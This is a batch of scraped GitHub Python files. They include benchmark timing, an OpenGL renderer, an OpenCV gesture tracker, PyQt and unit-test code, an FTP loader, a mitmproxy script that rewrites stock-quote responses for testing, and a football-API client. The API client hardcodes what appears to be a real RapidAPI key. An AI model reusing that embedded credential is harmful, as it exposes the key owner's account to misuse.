').\\S*')\n result = re.search('(?<=' + token + ').\\S*', output).group(0).strip()\n print(token, result)\n times.append(float(result))\n results.append(times)\n \n print(results) \n# print(\"Results for\", threads, \"threads:\")\n # zip(*) creates array of arrays where each array is a type of time, i.e. total time\n print(\"zip results:\", list(zip(*results)))\n means_dict = {}\n for time_type, time_list in zip(program['time_tokens'], list(zip(*results))):\n time_list = list(time_list)\n print(time_type, ':', time_list)\n time_list.remove(max(time_list))\n time_list.remove(min(time_list))\n mean = sum(time_list)/len(time_list)\n means_dict[time_type] = mean; \n\n print(\"Final means dict\", means_dict)\n return means_dict \n\n# [program] Dict\ndef collect_seq_data(program):\n results = []\n for i in range(3): \n output = subprocess.run([program['program_name'], '../allChromosomes_pretty.fa', '../out.fa'], capture_output=True).stdout.decode('utf-8')\n times = [] # An array where each element is one time per execution\n for token in program['time_tokens']:\n print('OUTPUT:', output)\n print('Searching for', '(<=' + token + ').\\S*')\n result = re.search('(?<=' + token + ').\\S*', output).group(0).strip()\n print(token, result, 'actual result:', result[:-1])\n times.append(float(result[:-1]))\n results.append(times)\n print(\"Seq times:\", results)\n\n times_dict = {}\n # zip(*) creates array of arrays where each array is a type of time, i.e. total time\n for time_type, time_list in zip(program['time_tokens'], zip(*results)): \n time_list = list(time_list)\n print(time_type, ':', time_list)\n time_list.remove(max(time_list))\n time_list.remove(min(time_list))\n mean = sum(time_list)/len(time_list)\n times_dict[time_type] = mean;\n\n print(\"Final seq results\", times_dict)\n return times_dict\n\n\n# Returns [(threads, {'time_token': speedup, ...}), ...]\ndef calculate_speedup(baseline_means, test_times):\n speedup_dict = {}\n print(baseline_means, test_times)\n\n # datum = (threads, {token_string: mean_time, ...})\n print(\"test_times:\", test_times)\n for key, val in test_times.items():\n speedup = baseline_means[key] / val * 100\n speedup_dict[key] = speedup\n\n print(\"Final speedups:\", speedup_dict)\n return speedup_dict\n\n# collect_seq_data\n# returns {'time_token': mean_time, ...}\n# i.e., a dict of key-value pairs\n# each key is a value from program['time_types']\n# value for each key is mean execution time\nseq_means = collect_seq_data(seq)\n\n# Execute on one machine with 6 cores\nopt6_results = collect_data(opt, 6, False)\n# Execute using host file and 12 cores\nopt12_results = collect_data(opt, 12, True)\n\n# List of tuples where each tuple is (threads, {'time_token': speedup, ...})\nopt6_speedups = calculate_speedup(seq_means, opt6_results)\nopt12_speedups = calculate_speedup(seq_means, opt12_results)\n\"\"\"\nopt6_data = pd.DataFrame({\n \"Reading Time\": opt6_speedups['Final reading time:'],\n \"Computation Time\": opt6_speedups['Final computation time:'], \n \"Writing Time\": opt6_speedups['Final writing time:'], \n \"Total Time\": opt6_speedups['Final total time:']\n})\n\n\nopt12_data = pd.DataFrame({\n \"Reading Time\": opt12_speedups['Final reading time:'],\n \"Computation Time\": opt12_speedups['Final computation time:'], \n \"Writing Time\": opt12_speedups['Final writing time:'], \n \"Total Time\": opt12_speedups['Final total time:'] \n})\n\"\"\"\n\nfilename = 'Translator'\n\n# ['Reading time:', 'Computation time:', 'Writing time:', 'Total time:']\n\n\nfig = plt.figure()\nplt.title('OPT6 vs OPT12 Speedups')\nax = fig.add_subplot(111)\nX = np.arange(4)\nopt6 = [value for _,value in opt6_speedups.items()] \nopt12 = [value for _,value in opt12_speedups.items()] \np1 = plt.bar(X + 0.00, opt6, color = 'b', width = 0.25)\np2 = plt.bar(X + 0.25, opt12, color = 'g', width = 0.25)\n\n \n#ax.scatter(opt6_, opt6_data['Reading Time'], label = 'Reading Time')\n#ax.scatter(opt6_data['Threads'], opt6_data['Computation Time'], label = 'Computation Time')\n#ax.scatter(opt6_data['Threads'], opt6_data['Writing Time'], label = 'Writing Time')\n\n#ax.scatter(opt6_data['Threads'], opt6_data['Total Time'], label = 'Total Time')\n#plt.xlabel('Threads')\nplt.ylabel('Speedup (%)')\nplt.xlabel('Time Metric')\nplt.xticks(X, ('Reading Time', 'Computation Time', 'Writing Time', 'Total Time'))\nplt.legend((p1[0], p2[0]), ('OPT6', 'OPT12'))\nplt.savefig('opt-results.png')\n\n#fig = plt.figure()\n#ax = fig.add_subplot(111)\n#plt.title('Speedup SEQ vs OPT12')\n#ax.scatter(opt12_data['Threads'], opt12_data['Reading Time'], label = 'Reading Time')\n#ax.scatter(opt12_data['Threads'], opt12_data['Computation Time'], label = 'Computation Time')\n#ax.scatter(opt12_data['Threads'], opt12_data['Writing Time'], label = 'Writing Time')\n\n#ax.scatter(opt12_data['Threads'], opt12_data['Total Time'], label = 'Total Time')\n#plt.xlabel('Threads')\n#plt.ylabel('Speedup (%)')\n#plt.legend()\n#plt.savefig('opt12-results.png')\n\nplt.show() \n\n","repo_name":"MatthewJMoreno/TranslateRNAtoProtien","sub_path":"collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"37064796920","text":"import OpenGL\nOpenGL.ERROR_CHECKING = False\nimport OpenGL.GL as gl\nfrom glumpy import gloo, app\napp.use('glfw')\nimport numpy as np\nimport os\n\n\nclass Model:\n\n _idx_offset = 0 # offset added to indices in index buffer to address joint vertex buffer correctly\n\n def __init__(self, mesh=None):\n\n if mesh is not None:\n # load using trimesh\n # mesh = mesh.apply_scale(1/1000) # to meters\n pts = mesh.vertices.view(np.ndarray).astype(np.float32)\n if not hasattr(mesh.visual, \"uv\"):\n texture_uv = np.zeros((pts.shape[0], 2))\n else:\n texture_uv = mesh.visual.uv.view(np.ndarray).astype(np.float32)\n faces = mesh.faces.view(np.ndarray).astype(np.uint32).reshape(-1,)\n\n # extend vertices to faces size - allows to fix models with broken normal information\n pts = pts[faces]\n normals = np.asarray([[fn, fn, fn] for fn in mesh.face_normals]).reshape(-1, 3)\n texture_uv = texture_uv[faces]\n faces = np.arange(pts.shape[0])\n\n # prepare buffers -- we use a single VBO, thus indices need to be offset\n vertices_type = [('a_position', np.float32, 3),\n ('a_normal', np.float32, 3),\n ('a_texcoord', np.float32, 2)]\n\n self.vertex_buffer = np.array(list(zip(pts, normals, texture_uv)), vertices_type)\n self.index_buffer = (faces.flatten().astype(np.uint32) + Model._idx_offset).view(gloo.IndexBuffer)\n\n Model._idx_offset += self.vertex_buffer.shape[0]\n else:\n self.vertex_buffer, self.index_buffer = None, None\n\n # model space offset\n self.mat_offset = np.eye(4)\n self.mat_offset[:3, :3] = np.diag([1/1000]*3) # to meters\n\n def draw(self, program):\n program.draw(gl.GL_TRIANGLES, self.index_buffer)\n\n\nclass ScreenQuad(Model):\n\n def __init__(self):\n Model.__init__(self)\n pts = np.array([\n [-1, -1, 0],\n [ 1, -1, 0],\n [ 1, 1, 0],\n [-1, 1, 0]\n ]).astype(np.float32)\n normals = np.array([[0, 0, 1]]*4).astype(np.float32)\n uvs = np.array([[0, 1], [1, 1], [1, 0], [0, 0]]).astype(np.float32)\n faces = np.array([[0, 2, 3], [0, 1, 2]]).astype(np.uint32).reshape(-1)\n\n vertices_type = [('a_position', np.float32, 3),\n ('a_normal', np.float32, 3),\n ('a_texcoord', np.float32, 2)]\n vertices = np.array(list(zip(pts, normals, uvs)), vertices_type)\n\n # prepare buffers -- we use a single VBO, thus indices need to be offset\n self.vertex_buffer = vertices\n self.index_buffer = (faces.astype(np.uint32) + Model._idx_offset).view(gloo.IndexBuffer)\n\n Model._idx_offset += vertices.shape[0]\n\n\nclass Renderer:\n\n def __init__(self, meshes, width=640, height=480):\n self.width, self.height = width, height\n self.near, self.far = 0.01, 5.0 # in meters\n self.window = app.Window(width, height, visible=False)\n\n # FBOs: one per stage\n self.normal_depth_buf = np.zeros((height, width, 4), np.float32).view(gloo.TextureFloat2D)\n self.depth_buf = np.zeros((height, width), np.float32).view(gloo.DepthTexture)\n self.fbo_stage_1 = gloo.FrameBuffer(color=self.normal_depth_buf, depth=self.depth_buf)\n\n self.cost_buf = np.zeros((height, width, 4), np.float32).view(gloo.TextureFloat2D)\n self.fbo_stage_2 = gloo.FrameBuffer(color=self.cost_buf)\n\n # load models\n self.models = [Model(mesh) for mesh in meshes]\n self.models.append(ScreenQuad()) # used for stage 2\n\n # VBO: one for all models - bind once, draw according to model indices\n self.vertex_buffer = np.hstack([model.vertex_buffer for model in self.models]).view(gloo.VertexBuffer)\n for model in self.models:\n model.vertex_buffer = self.vertex_buffer\n\n # shader\n basepath = os.path.dirname(os.path.abspath(__file__))\n with open(f\"{basepath}/score.vert\", 'r') as file:\n shader_vertex = \"\".join(file.readlines())\n with open(f\"{basepath}/score.frag\", 'r') as file:\n shader_fragment = \"\".join(file.readlines())\n self.program = gloo.Program(shader_vertex, shader_fragment)\n self.program['u_texture'] = np.zeros((512, 512, 3), np.float32)\n self.program.bind(self.vertex_buffer) # is bound once -- saves some time\n\n # self.fbo_stage_1.activate()\n gl.glViewport(0, 0, self.width, self.height)\n gl.glClearColor(0.0, 0.0, 0.0, 0.0)\n gl.glEnable(gl.GL_DEPTH_TEST)\n\n self.observation = None\n self.set_observation(np.zeros((height, width, 1)), np.zeros((height, width, 3)))\n\n def set_observation(self, observation_d, observation_n):\n if self.observation is not None:\n self.observation.delete()\n self.observation_np = np.dstack([observation_n, observation_d/1000]).astype(np.float32)\n self.observation = (np.dstack([observation_n, observation_d/1000]).astype(np.float32)[::-1, :, :])\\\n .view(gloo.TextureFloat2D)\n self.program['u_observation'] = self.observation\n\n def render(self, model_ids, model_trafos, extrinsics, intrinsics, cull_back=True):\n # PREPARE RENDERING\n # compose model matrix:\n # - apply model space offset\n # - apply pose (in camera space)\n # - transform to world space\n # - transpose to be row major (OpenGL)\n mats_off = [self.models[model_id].mat_offset for model_id in model_ids]\n mats_model = [m.copy() for m in model_trafos]\n\n mat_world2cam = extrinsics.copy()\n R = mat_world2cam[:3, :3].T\n t = -R @ mat_world2cam[:3, 3]\n mat_cam2world = np.eye(4)\n mat_cam2world[:3, :3], mat_cam2world[:3, 3] = R, t\n\n mats_model = [(mat_cam2world @ mat_model @ mat_off).T for mat_model, mat_off in zip(mats_model, mats_off)]\n\n # prepare view and projection matrices (row major)\n mat_view = self._compute_view(mat_cam2world) # gl view matrix from camera matrix\n mat_proj = self._compute_proj(intrinsics) # projection matrix\n mat_view_proj = mat_view @ mat_proj # view-projection matrix\n\n # STAGE 1) compute \\hat{d}_T and \\hat{n}_T: render model under estimated pose\n self.fbo_stage_1.activate()\n gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)\n if not cull_back:\n gl.glDisable(gl.GL_CULL_FACE) # fixes rendering of single-sided lamp mesh in LINEMOD\n self.program['u_mode'] = 0\n\n for i, (model_id, m) in enumerate(zip(model_ids, mats_model)):\n self.program['u_mv'] = m @ mat_view\n self.program['u_mvp'] = m @ mat_view_proj\n\n try:\n model = self.models[model_id]\n model.draw(self.program)\n except ValueError as _:\n print(\"failed to draw\")\n return 0\n if not cull_back:\n gl.glEnable(gl.GL_CULL_FACE) # enable again for rendering other stuff\n\n buffer = np.zeros((self.height, self.width, 4), dtype=np.float32)\n gl.glReadPixels(0, 0, self.width, self.height, gl.GL_RGBA, gl.GL_FLOAT, buffer)\n buffer.shape = self.height, self.width, 4\n buffer = buffer[::-1]\n return buffer[..., 3], buffer[..., :3] # depth and normals\n\n def compute_score(self, model_ids, model_trafos, extrinsics, intrinsics, cull_back=True, return_map=False,\n use_normals=True):\n # PREPARE RENDERING\n\n # compose model matrix:\n # - apply model space offset\n # - apply pose (in camera space)\n # - transform to world space\n # - transpose to be row major (OpenGL)\n mats_off = [self.models[model_id].mat_offset for model_id in model_ids]\n mats_model = [m.copy() for m in model_trafos]\n\n mat_world2cam = extrinsics.copy()\n R = mat_world2cam[:3, :3].T\n t = -R @ mat_world2cam[:3, 3]\n mat_cam2world = np.eye(4)\n mat_cam2world[:3, :3], mat_cam2world[:3, 3] = R, t\n\n mats_model = [(mat_cam2world @ mat_model @ mat_off).T for mat_model, mat_off in zip(mats_model, mats_off)]\n\n # prepare view and projection matrices (row major)\n mat_view = self._compute_view(mat_cam2world) # gl view matrix from camera matrix\n mat_proj = self._compute_proj(intrinsics) # projection matrix\n mat_view_proj = mat_view @ mat_proj # view-projection matrix\n\n # STAGE 1) compute \\hat{d}_T and \\hat{n}_T: render model under estimated pose\n self.fbo_stage_1.activate()\n gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)\n if not cull_back:\n gl.glDisable(gl.GL_CULL_FACE) # fixes rendering of single-sided lamp mesh in LINEMOD\n self.program['u_mode'] = 0\n\n for i, (model_id, m) in enumerate(zip(model_ids, mats_model)):\n self.program['u_mv'] = m @ mat_view\n self.program['u_mvp'] = m @ mat_view_proj\n\n try:\n model = self.models[model_id]\n model.draw(self.program)\n except ValueError as _:\n print(\"failed to draw\")\n return 0\n if not cull_back:\n gl.glEnable(gl.GL_CULL_FACE) # enable again for rendering other stuff\n\n # STAGE 2)\n # - compute sub-scores f_d(T) and f_n(T) per-pixel\n self.fbo_stage_2.activate()\n self.program['u_texture'] = self.normal_depth_buf\n self.program['u_mode'] = 1\n self.program['u_mv'] = np.eye(4)\n self.program['u_mvp'] = np.eye(4)\n self.models[-1].draw(self.program)\n\n if return_map:\n buffer = np.zeros((self.height, self.width, 4), dtype=np.float32)\n gl.glReadPixels(0, 0, self.width, self.height, gl.GL_RGBA, gl.GL_FLOAT, buffer)\n buffer.shape = self.height, self.width, 4\n\n # - compute verification score \\bar{f}(T): speed-up summation by reading from mipmap layer\n gl.glActiveTexture(gl.GL_TEXTURE0)\n gl.glBindTexture(gl.GL_TEXTURE_2D, self.cost_buf.handle)\n gl.glGenerateMipmap(gl.GL_TEXTURE_2D)\n layer = 4\n buf = np.zeros((int(self.height / (2 ** layer)), int(self.width / (2 ** layer)), 4), dtype=np.float32)\n per_pixel_fit = gl.glGetTexImage(gl.GL_TEXTURE_2D, layer, gl.GL_RGBA, gl.GL_FLOAT, buf)\n gl.glBindTexture(gl.GL_TEXTURE_2D, 0)\n\n n_valid = per_pixel_fit[:, :, 0].sum()\n if n_valid == 0: # no valid pixel -> minimal fit\n score = 0\n else:\n mean_f_d = per_pixel_fit[:, :, 1].sum() / n_valid\n mean_f_n = per_pixel_fit[:, :, 2].sum() / n_valid if use_normals else 0\n score = (mean_f_d + mean_f_n) * 0.5\n\n if return_map and use_normals:\n return score, buffer[..., 1], buffer[..., 2] # score, f_d, f_n\n elif return_map and not use_normals:\n return score, buffer[..., 1], np.zeros_like(buffer[..., 1]) # score, f_d, zeros\n else:\n return score\n\n def _compute_view(self, cam):\n R, t = cam[:3, :3], cam[:3, 3]\n\n # camera coord axes\n z = R @ [0, 0, 1]\n z = -z / np.linalg.norm(z)\n y = R @ [0, -1, 0]\n y = y / np.linalg.norm(y)\n x = np.cross(y, z)\n x = x / np.linalg.norm(x)\n\n # invert to get view matrix\n view = np.eye(4)\n view[:3, :3] = np.vstack((x, y, z)).T\n view[3, :3] = -view[:3, :3].T @ t\n\n return view\n\n def _compute_proj(self, intrinsics):\n width, height = self.width, self.height\n near, far = self.near, self.far\n fx = intrinsics[0, 0]\n fy = intrinsics[1, 1]\n cx = intrinsics[0, 2]\n cy = intrinsics[1, 2]\n s = intrinsics[0, 1]\n q = -(far + near) / (far - near)\n qn = -2 * far * near / (far - near)\n mat_proj = np.array([[2 * fx / width, -2 * s / width, (-2 * cx + width) / width, 0],\n [0, 2 * fy / height, (2 * cy - height) / height, 0],\n [0, 0, q, qn],\n [0, 0, -1, 0]]).T\n return mat_proj\n","repo_name":"dornik/sporeagent","sub_path":"environment/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":12245,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"91"}
+{"seq_id":"73046178863","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 20 19:00:03 2019\r\n\r\n@author: ADITYA\r\n\"\"\"\r\n\r\nimport cv2 as cv\r\nimport numpy as np\r\n\r\nvideo = cv.VideoCapture(0)\r\nframe2 = None\r\ncv.waitKey(5)\r\nx2 = y2 = None\r\nwhile True:\r\n ret,frame= video.read() \r\n if frame2 is None: #Reference Frame Initialisation (keep glove wearing hand out of frame)'''\r\n frame2=frame \r\n d = cv.absdiff(frame,frame2)\r\n gray = cv.cvtColor(d,cv.COLOR_BGR2GRAY)\r\n hsv = cv.cvtColor(frame,cv.COLOR_BGR2HSV)\r\n lr = np.array([110,50,50])\r\n ur= np.array([130,255,255])\r\n mask= cv.inRange(hsv, lr, ur) #color detection (blue)'''\r\n blur = cv.GaussianBlur(gray,(5,5),0)\r\n ret, th = cv.threshold(blur,20,255,cv.THRESH_BINARY)\r\n frame3 = cv.bitwise_and(th,mask, mask= mask) # intersection of color detection and object detection'''\r\n dilated = cv.dilate(frame3, np.ones((3,3),np.uint8),iterations=1)\r\n \r\n c ,h = cv.findContours(dilated, cv.RETR_EXTERNAL,cv.CHAIN_APPROX_SIMPLE)\r\n for contour in c:\r\n if cv.contourArea(contour)<5000: #area threshold'''\r\n continue\r\n x,y,w,h = cv.boundingRect(contour)\r\n x1 = x+w/2 # to find the centroid of hand'''\r\n y1 = y+h/2\r\n cv.rectangle(frame, (x,y),(x+w,y+h),(0,255,0),3)\r\n if x2 is None or y2 is None:\r\n x2 = x1 #initial storing of centroid to be compared with next frame'''\r\n y2 = y1\r\n continue\r\n if x2-x1 > 20:\r\n print(\"Right\")\r\n if x1-x2 > 20:\r\n print(\"Left\")\r\n if y2-y1 > 20:\r\n print(\"Forward\")\r\n if y1-y2 > 20:\r\n print(\"Reverse\")\r\n #print(x1,y1) \r\n x2 = x1 \r\n y2 = y1\r\n break\r\n \r\n \r\n \r\n #cv.drawContours(frame1, c, -1, (0,255,0),2)\r\n cv.imshow('frame',frame)\r\n cv.imshow('frame3',dilated)\r\n frame1=frame\r\n if cv.waitKey(1)==27:\r\n break\r\nvideo.release()\r\ncv.destroyAllWindows() ","repo_name":"adityarnair/Opencv-object-detection","sub_path":"diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"38150090785","text":"class naive_bayes:\n def __init__(self, data, feature_type):\n self.class_prior = None\n self.feature_prob = None\n self.feature_type = feature_type\n self.target = list(self.feature_type)[-1]\n\n def train(self, x_train, y_train):\n \"\"\"updates the model parameters from the training data\n x_train: A pandas data frame, feature predictors\n y_train: A pandas Series, class labels of the training data\"\"\"\n\n # Finding the prior class probabilities\n\n if self.feature_type[self.target] is \"continuous\":\n print(\"Naive Bayes is a classification model. Cannot work with continuous data\")\n else:\n self.class_prior = y_train.value_counts(normalize=True)\n # print(self.class_prior)\n\n self.feature_type.pop(\"y\")\n\n for feature in self.feature_type:\n print(feature)","repo_name":"argowtham/Machine-Learning","sub_path":"bias_variance_analysis/naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"70846120624","text":"class Solution(object):\n def search(self, nums, target):\n \"\"\"\n :param nums:List[int]\n :param target:int\n :return:int\n \"\"\"\n if target not in nums:\n return -1\n return nums.index(target)\n\n\nnums = [4,5,6,7,0,1,2]\ntarget = 0\nprint(Solution().search(nums, target))","repo_name":"laintime01/pythonLearning","sub_path":"algorithm/leetcode33_searchInRotatedArray.py","file_name":"leetcode33_searchInRotatedArray.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"73068165103","text":"from FileLoader import FTPLoader\nimport parse_json as jp\nimport os\nimport time\nfrom logging import Log\nfrom multiprocessing import cpu_count, Queue, Process\n\ndef time_counter(func):\n def count(*args):\n start = time.time()\n func(*args)\n end = time.time()\n print(end - start)\n return count\n\n#delete '#' if you wont to count the time of work method\n#@time_counter\ndef start_processes(parse_res, count_cpu_param=1):\n user = [parse_res.user[\"host\"],\n parse_res.user[\"name\"],\n parse_res.user[\"password\"]]\n processes = []\n log = Log(os.path.dirname(os.path.abspath(__file__)))\n queue_of_paths = Queue()\n\n if not FTPLoader.check_login(*user, log):\n return\n\n for path in parse_res.paths:\n queue_of_paths.put(path)\n\n if queue_of_paths.qsize() < count_cpu_param:\n loader = FTPLoader(*user, log)\n loader.start_load(queue_of_paths)\n else:\n for i in range(count_cpu_param - 1):\n another_loader = FTPLoader(*user, log)\n\n # you can change Process to Thread and it will be work(don't forget import threading)\n process = Process(target=another_loader.start_load, args=(queue_of_paths, ))\n process.start()\n processes.append(process)\n\n loader = FTPLoader(*user, log)\n loader.start_load(queue_of_paths)\n\n\nif __name__ == \"__main__\":\n parsing_res = jp.ParseJson(\"conf.json\")\n if parsing_res.parsing_complete:\n count_cpu = cpu_count()\n start_processes(parsing_res, count_cpu)\n\n","repo_name":"fsatka/Python-Projects","sub_path":"FileLoader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"38831072434","text":"\"\"\"Unit tests for scalarstop.model_template.\"\"\"\nimport doctest\nimport unittest\n\nimport tensorflow as tf\n\nimport scalarstop as sp\n\n\ndef load_tests(loader, tests, ignore): # pylint: disable=unused-argument\n \"\"\"Have the unittest loader also run doctests.\"\"\"\n tests.addTests(doctest.DocTestSuite(sp.model_template))\n return tests\n\n\nclass MyModelTemplate(sp.ModelTemplate):\n \"\"\"Our example model template for testing.\"\"\"\n\n @sp.dataclass\n class Hyperparams(sp.HyperparamsType):\n \"\"\"HYperparams for MyModelTemplate.\"\"\"\n\n a: int\n b: str = \"hi\"\n\n def set_model(self):\n \"\"\"Setting a new model.\"\"\"\n model = tf.keras.Sequential(\n layers=[tf.keras.layers.Dense(units=self.hyperparams.a)]\n )\n model.compile()\n return model\n\n\nclass MyModelTemplateForgotHyperparams(sp.ModelTemplate):\n \"\"\"See what happens when we don't define hyperparams.\"\"\"\n\n Hyperparams = None # type: ignore\n\n\nclass TestModelTemplate(unittest.TestCase):\n \"\"\"Tests for :py:class:`scalarstop.ModelTemplate`.\"\"\"\n\n def test_name(self):\n \"\"\"Test that names work.\"\"\"\n model_template_1 = MyModelTemplate(\n hyperparams=dict(a=1),\n )\n model_template_2 = MyModelTemplate(hyperparams=dict(a=1, b=\"hi\"))\n for i, model_template in enumerate((model_template_1, model_template_2)):\n with self.subTest(f\"model_template_{i}\"):\n self.assertEqual(\n model_template.name, \"MyModelTemplate-naro6iqyw9whazvkgp4w3qa2\"\n )\n self.assertEqual(model_template.group_name, \"MyModelTemplate\")\n self.assertEqual(\n sp.dataclasses.asdict(model_template.hyperparams), dict(a=1, b=\"hi\")\n )\n\n def test_missing_hyperparams_class(self):\n \"\"\"Test what happens when the hyperparams class itself is missing.\"\"\"\n with self.assertRaises(sp.exceptions.YouForgotTheHyperparams):\n MyModelTemplateForgotHyperparams()\n","repo_name":"scalarstop/scalarstop","sub_path":"tests/test_model_template.py","file_name":"test_model_template.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"9503627199","text":"\n\nfrom PyQt4.QtCore import pyqtSignal, Qt\nfrom PyQt4.QtGui import QTableView, QApplication, QWidget, QVBoxLayout\nfrom PyQt4.QtGui import QLineEdit, QSpinBox, QDoubleSpinBox, QCheckBox\n\nclass PersonDataForm(QWidget):\n\n def __init__(self, parent=None):\n super(PersonDataForm, self).__init__(parent)\n\n self._setupUi()\n\n\n def _setupUi(self):\n\n self.setLayout(QVBoxLayout())\n\n self.forenameInput = QLineEdit(self)\n self.forenameInput.setObjectName('forenameInput')\n self.layout().addWidget(self.forenameInput)\n\n self.surnameInput = QLineEdit(self)\n self.surnameInput.setObjectName('surnameInput')\n self.layout().addWidget(self.surnameInput)\n\n self.ageInput = QSpinBox(self)\n self.ageInput.setObjectName('ageInput')\n self.ageInput.setRange(0, 200)\n self.layout().addWidget(self.ageInput)\n\n self.weightInput = QDoubleSpinBox(self)\n self.weightInput.setObjectName('weightInput')\n self.weightInput.setRange(0.0, 1000.0)\n self.layout().addWidget(self.weightInput)\n\n self.incomeInput = QDoubleSpinBox(self)\n self.incomeInput.setObjectName('incomeInput')\n self.incomeInput.setRange(0.0, 1000.0)\n self.layout().addWidget(self.incomeInput)\n\n self.marriedInput = QCheckBox(self)\n self.marriedInput.setObjectName('marriedInput')\n self.layout().addWidget(self.marriedInput)","repo_name":"mtils/ems","sub_path":"examples/qt4/gui/persondata_form.py","file_name":"persondata_form.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"}
+{"seq_id":"8988796169","text":"\"\"\"\n这里是尝试对数据进行一个批量的处理或者说数据清理\n还是相同的理念:\n1- 需要知道对应处理接口的数据返回形式\n2- 需要知道想进行什么样子的处理\n万变不离其宗,所有dict或者list复杂数据类型,or 是数字或者字符串或者布尔型的数据,后者都是递归后处理的核心部分\n\"\"\"\nimport json\nfrom mitmproxy import http\n\nrules = [0, 1, 3, 5, 100]\nurl_index = dict()\n\n\n# @pytest.mark.parametrize(\"rules\", [0, 1, 3, 5, 100])\ndef response(flow: http.HTTPFlow):\n url = flow.request.url.split(\".json\")[0]\n # 针对对url的访问次数来实现不同的参数处理\n if url not in url_index.keys():\n url_index[url] = 0\n else:\n url_index[url] += 1\n seed = int(url_index[url] % len(rules))\n index = rules[seed]\n\n # 需要处理的接口中存在一个x=**\n if \"quote.json\" in flow.request.url and \"x=\" in flow.request.url:\n # 先接收到返回的数据\n data = json.loads(flow.response.content)\n # 对数据进行批量修改\n new_data = json_travel(data, array=2, text=index, num=index)\n print()\n # 打印\n data_mess = json.dumps(new_data, indent=2, ensure_ascii=False)\n print(\"=====================修改后的信息=======================================\")\n print(data_mess)\n\n # 返回修改的数据\n flow.response.text = json.dumps(new_data)\n\n\ndef json_travel(data, array=None, text=1, num=1):\n \"\"\"\n 完成json数据的倍数操作\n :param data: 要修改的内容\n :param array: 列表的修改规则,为None默认不修改\n :param text: 字符串的修改规则,为1默认不修改\n :param num: 整数或者浮点数的修改规则,为1默认不修改\n :return: data_new\n \"\"\"\n # 如果接口返回的参数是dict复杂数据类型,进行遍历:\n if isinstance(data, dict):\n data_new = dict()\n for k, v in data.items():\n # 对字典内部的数据再次进行一个递归,因为value还是一个复杂数据类型\n data_new[k] = json_travel(v, array, text, num)\n # 对应行情中每一只股票的名称,这里可以再进行处理,方便直接看出效果\n if k == \"name\":\n data_new[k] = json_travel(v, array, text=2, num=1)\n\n # 如果是列表,就对列表的每一项进行一个遍历,并进行数据处理\n elif isinstance(data, list):\n data_new = list()\n for item in data:\n item_new = json_travel(item, array, text, num)\n # 如果传入的array为空,则不进行处理\n if array is None:\n data_new.append(item_new)\n # 若array不为空,判断array修改规则\n else:\n if isinstance(array, int) and array >= 0:\n for i in range(array):\n data_new.append(item_new)\n else:\n data_new = data\n\n # 如果传入的是字符串,则和传入的text参数进行相乘,实现对字符串的修改\n elif isinstance(data, str):\n if isinstance(text, int) and text >= 0:\n data_new = data * text\n else:\n data_new = data\n\n # 如果是int或者float的数据,就对数字做一个乘积\n elif isinstance(data, int) or isinstance(data, float):\n data_new = data * num\n\n else:\n data_new = data\n\n return data_new\n","repo_name":"Dearin/Hogwarts","sub_path":"mitm_demo/test_mitm_handle.py","file_name":"test_mitm_handle.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"73484601584","text":"import http.client\nimport json\n\ndef getLigue1():\n conn = http.client.HTTPSConnection(\"api-football-v1.p.rapidapi.com\")\n headers = {\n 'X-RapidAPI-Key': \"08b693ac18msh71caadac3647d76p1d887fjsn29e7dc24331f\",\n 'X-RapidAPI-Host': \"api-football-v1.p.rapidapi.com\"\n }\n\n conn.request(\"GET\", \"/v3/leagues?id=61\", headers=headers)\n res = conn.getresponse()\n data = res.read()\n print(data.decode(\"utf-8\"))\n\n\ndef getLigue1Teams(id):\n conn = http.client.HTTPSConnection(\"api-football-v1.p.rapidapi.com\")\n headers = {\n 'X-RapidAPI-Key': \"08b693ac18msh71caadac3647d76p1d887fjsn29e7dc24331f\",\n 'X-RapidAPI-Host': \"api-football-v1.p.rapidapi.com\"\n }\n conn.request(\"GET\", f\"/v3/teams/statistics?league=61&season=2023&team={id}\", headers=headers)\n res = conn.getresponse()\n data = res.read().decode(\"utf-8\")\n response = json.loads(data)\n team = response.get(\"response\", {}).get(\"team\", [])\n goals = response.get(\"response\", {}).get(\"total\", [])\n return team\n\n\n\n\n","repo_name":"steeve-dev/ligue1data","sub_path":"ligue1data/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
